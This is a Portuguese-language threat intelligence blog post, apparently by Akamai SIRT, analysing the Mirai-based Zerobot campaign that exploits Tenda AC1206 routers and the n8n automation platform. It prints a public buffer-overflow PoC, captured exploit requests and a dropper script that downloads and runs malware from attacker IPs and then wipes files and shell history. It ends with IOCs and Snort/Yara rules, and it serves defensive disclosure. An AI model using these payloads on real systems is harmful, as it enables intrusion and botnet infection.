Resumo executivo
- A SIRT (Security Intelligence and Response Team, equipe de inteligência e resposta de segurança) da Akamai identificou a exploração ativa das vulnerabilidades de injeção de comando CVE-2025-7544 e CVE-2025-68613 contra roteadores Tenda AC1206 e a plataforma de automação n8n.
- A SIRT identificou pela primeira vez essa atividade em nossa rede global de honeypots em janeiro de 2026. Essa é a primeira exploração ativa relatada dessas vulnerabilidades desde a divulgação inicial em julho de 2025 e dezembro de 2025, respectivamente.
- Incluímos uma lista de IOCs (Indicators Of Compromise, indicadores de comprometimento) nesta postagem do blog para ajudar na defesa contra essa ameaça.
Introdução
A SIRT da Akamai descobriu uma campanha de malware baseada em Mirai em andamento, a Zerobot, que visa uma variedade de CVEs (Common Vulnerability and Exposure, exposição e vulnerabilidade comuns) recentes, incluindo as que afetam os roteadores Tenda AC1206 e a plataforma de automação de fluxo de trabalho n8n. A campanha de botnets surgiu aproximadamente em dezembro de 2025, com explorações recentes identificadas em nossa rede global de honeypots em meados de janeiro de 2026. O foco dessa campanha é espalhar uma variante do malware Mirai.
A exploração da vulnerabilidade da n8n é particularmente interessante: os botnets normalmente exploram dispositivos da IoT (Internet das coisas), como câmeras de segurança, DVRs e roteadores, mas a n8n se enquadra em uma categoria totalmente diferente.
Embora o comportamento não seja novidade em botnets, esse tipo de exploração apresenta um perigo maior para as organizações, pois ela expõe uma infraestrutura mais crítica a um comprometimento, já que a exploração da n8n poderia possibilitar o movimento lateral para um agente de ameaças.
Vulnerabilidades exploradas
As observações da SIRT indicam que o Zerobot está visando duas vulnerabilidades diferentes: CVE-2025-7544 e CVE-2025-68613. Os selos de data e hora das tentativas de exploração a nossos honeypots apontam que elas ocorreram após a divulgação pública das CVEs, confirmando que essas vulnerabilidades não eram de dia zero.
A exploração oportunista de vulnerabilidades recentemente divulgadas por agentes de ameaças é bastante comum nos dias de hoje. Até mesmo organizações mais atentas que estão sempre aplicando patches muitas vezes terão uma janela de vulnerabilidade após a divulgação inicial; porém, algumas organizações negligenciam a aplicação de patches nesses dispositivos.
Detalhes do CVE-2025-7544
Publicado em meados de julho de 2025, o CVE-2025-7544 é um excesso de buffer baseado em pilha remota que afeta o endpoint /goform/setMacFilterCfg em dispositivos Tenda AC1206 versão 15.03.06.23. Ele foi classificado como crítico e pode ser explorado por meio do parâmetro deviceList. Devido à função parse_macfilter_rule, a variável s (tecnicamente v3) é passada para a função strcpy sem qualquer verificação de comprimento, o que pode exceder o buffer baseado em pilha dest (que é s_2).
Pela solicitação da página, um invasor, mesmo remotamente, pode facilmente executar um ataque de DoS (negação de serviço) ou uma RCE (execução remota de código). Uma PoC (prova de conceito) pública está disponível e detalha a vulnerabilidade e a exploração (Figura 1).
import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
"macFilterType": "white",
"deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)Detalhes do CVE-2025-68613
Publicado em meados de dezembro de 2025, o CVE-2025-68613 é uma vulnerabilidade de RCE que afeta o sistema de avaliação de expressão de fluxo de trabalho na plataforma de automação de fluxo de trabalho n8n (nas versões 0.211.0 a 1.20.4, 1.21.1 e 1.22.0) que foi classificada como crítica.
Na n8n, os usuários podem gravar expressões em fluxos de trabalho para processar dados dinamicamente. No entanto, essas expressões não foram avaliadas em um ambiente de testes adequado, o que permite que invasores saiam do contexto de execução pretendido para executar código arbitrário no servidor. Ao executar essas expressões no sistema subjacente, um invasor também pode ler e gravar arquivos no servidor, roubar variáveis de ambiente, como chaves de API e estabelecer persistência.
É uma vulnerabilidade é bem fácil de explorar, sendo necessário apenas um login de usuário sem privilégios administrativos, e pode acessar todos os dados aos quais a n8n tem acesso. Muitas organizações usam a n8n para diversos fins, como integração de bancos de dados com serviços em nuvem, automação do processamento de dados, gerenciamento de dados confidenciais e conexão de várias plataformas e sistemas internos. Uma exploração de PoC pública também está disponível para essa vulnerabilidade.
Exploração ativa do Tenda e da n8n
A SIRT da Akamai descobriu tentativas de exploração ativas do Zerobot ao CVE-2025-7544 em nossa rede global de honeypots desde meados de janeiro de 2026. Conforme a Figura 2, a tentativa de exploração aciona o excesso de buffer pelo uso de 500 caracteres "A" no parâmetro deviceList, que então permite que eles executem seu código arbitrário. A exploração então baixa e executa um script shell malicioso chamado tol.sh do endereço IP 144.172.100.228 baseado nos EUA.
/goform/setMacFilterCfg
macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -cA SIRT também notou o Zerobot tentando explorar uma das vulnerabilidades recentes da n8n: o CVE-2025-68613 (Figura 3). A funcionalidade é, em grande parte, igual à outra tentativa de exploração, na qual ele baixa e executa o script shell tol.sh para buscar e carregar a carga útil principal do malware Mirai do zerobotv9.
/rest/workflow/run
{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}
Embora a n8n ser visada por um botnet baseado em Mirai não seja inédito, é uma mudança notável da exploração típica de dispositivos de IoT. O potencial de um botnet obter acesso e persistência, bem como possivelmente usar movimento lateral, na infraestrutura crítica de uma organização é um grande motivo de preocupação.
Botnet Zerobot
O script shell na Figura 4 busca e executa a principal carga de malware baseada em Mirai chamada zerobotv9, que é compatível com uma variedade de arquiteturas diferentes, o que é comum para downloaders Mirai. A carga útil empacotada UPX tem uma variedade de strings e parâmetros criptografados, incluindo um domínio de comando e controle codificado do 0bot.qzz[.]io, e a string de execução comum do console do malware Mirai, que neste caso é "bruh why again".
O apelido Zerobot remonta a um artigo da Fortinet de 2022, mas não se sabe se os agentes de ameaças envolvidos estão relacionados. A nomenclatura indica que esta é a nona iteração do malware Zerobot, mas ainda não se sabe onde estão as outras oito versões.
Além da descoberta inicial em 2022, encontramos amostras de malware públicas chamadas zerobotv2 que datam a agosto de 2025, mas elas pareciam ser uma variante do malware LZRD Mirai comumente usado.
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4Há diversas diferenças entre o malware Zerobot original de 2022 e as amostras mais recentes do Zerobotv9. A diferença mais notável é que o original é muito maior em tamanho de arquivo e é escrito em Go, enquanto o Zerobotv9 é menor e não usa a mesma linguagem.
No entanto, encontramos algumas amostras marcadas com Zerobot no endereço IP original do downloader que datam a outubro de 2022 e que não foram escritas em Go. Tanto esta variante de outubro de 2022 quanto o Zerobotv9 usam a mesma chave XOR do malware Mirai original, a 0XDEADBEEF, ou 0x22.
Esta versão mais recente também conta com várias funções de ataque que a antiga não tinha, como TCPXmas, Mixamp, SSH e um método de ataque chamado Discord. Veja os usuários-agentes codificados na Figura 5.
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94Exploração adicional
Embora a exploração ativa dos dispositivos Tenda e da plataforma n8n seja o destaque desta publicação, a SIRT também observou que o Zerobot visa várias outras vulnerabilidades, incluindo CVE-2017-9841 (Figura 6), CVE-2021-3129 (Figura 7), CVE-2022-22947 (Figura 8) entre outros.
Essas tentativas diferem um pouco das tentativas de exploração destacadas, pois usam netcat e socat para abrir uma conexão TCP bruta e ler dados do soquete para stdout, seguido por comandos para executar o script para carregar na carga principal do malware Mirai.
Os agentes de ameaças também usaram esse método nas vulnerabilidades da n8n e do Tenda, e têm uma variedade de fallbacks, como soquetes Perl, PHP e Python e redirecionamento de Bash TCP. Esta técnica foi a que eles usaram pela primeira vez no início de dezembro de 2025, antes de mudar para o uso de ferramentas como curl e wget em janeiro de 2026.
Conclusão
Infelizmente, o Mirai continua se proliferando apesar de recentes operações de alto impacto das autoridades, já que a criação de um botnet baseado em Mirai pode ter uma barreira de entrada bastante baixa. Por dinheiro fácil, ou simplesmente pela adrenalina, um agente de ameaças relativamente inexperiente pode reutilizar código antigo do Mirai com algumas pequenas modificações ou até mesmo iterar usando ferramentas de IA.
A pesquisa e o desenvolvimento para produzir explorações de dia zero também não são necessários, pois a exploração de CVEs recentemente divulgadas ou de hardware desatualizado e negligenciado por algumas organizações pode ser bastante eficaz. Ele pode não se tornar um botnet massivo que recebe notoriedade, como o Aisuru, mas ainda pode gerar lucro para os operadores e possibilitar que eles passem despercebidos com mais facilidade.
A divulgação é um benefício líquido
Como relatamos anteriormente, o programa CVE às vezes pode servir como uma espada de dois gumes, trazendo à tona vulnerabilidades que, de outra forma, não foram detectadas por agentes de ameaça. Embora acreditemos que o programa ainda é um benefício líquido para o setor, é importante levar em consideração que os agentes de ameaças geralmente monitoram essas divulgações em busca de janelas de oportunidade de exploração antes que as organizações possam efetivamente corrigi-las.
Tanto as vulnerabilidades do Tenda quanto da n8n, exploradas pelo Zerobot, tinham vulnerabilidades de PoC públicas disponíveis, o que pode aumentar drasticamente a facilidade e a disseminação da exploração ativa. Principalmente considerando que a n8n às vezes é usada em fluxos de trabalho mais críticos pelas organizações, é altamente recomendável que qualquer organização potencialmente afetada proteja e corrija seus sistemas o mais rápido possível para se proteger contra essa ou outra atividade mal-intencionada.
Acompanhe-nos
A SIRT da Akamai continuará monitorando e relatando ameaças como essa para nossos clientes e para a comunidade de segurança em geral. Para acompanhar a SIRT e outras publicações do Akamai Security Intelligence Group, confira nossa página inicial de pesquisa e siga-nos nas redes sociais.
IOCs
Incluímos uma lista de IOCs, bem como regras do Snort e Yara, para ajudar os defensores.
Regras Snort para IPs
alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Regras Snort para detecção de resolução de domínio C2
alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)Regras Yara para amostras de malware
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-01-29"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$bruh = "bruh why again"
$url1 = "mamakmukekkontol"
$url2 = "inihiddenngentod"
$ip1 = "140.233.190.96"
$ip2 = "144.172.100.228"
$ip3 = "172.86.123.179"
$ip4 = "216.126.227.101"
$ip5 = "103.59.160.237"
$domain1 = "0bot.qzz.io"
$domain2 = "andro.notemacro.com"
$domain3 = “pivot.notemacro.com”
$hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
$hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
$hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
$hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
$hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
$hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
$hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
$hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
$hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
$hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"
condition:
(
$url1 or
$url2 or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9 or
$hash10
)
}Endereços IPv4 maliciosos
103.59.160.237
140.233.190.96
144.172.100.228
172.86.123.179
216.126.227.101
Domínios maliciosos
0bot.qzz.io
andro.notemacro[.]com/inihiddenngentod/zerobotv9.*
pivot.notemacro.com/inihiddenngentod/zerobotv9.*
Hashes SHA256
c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f
360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da
cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24
045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57
d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7
deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060
6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e
2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3
263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c
d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616
Tags
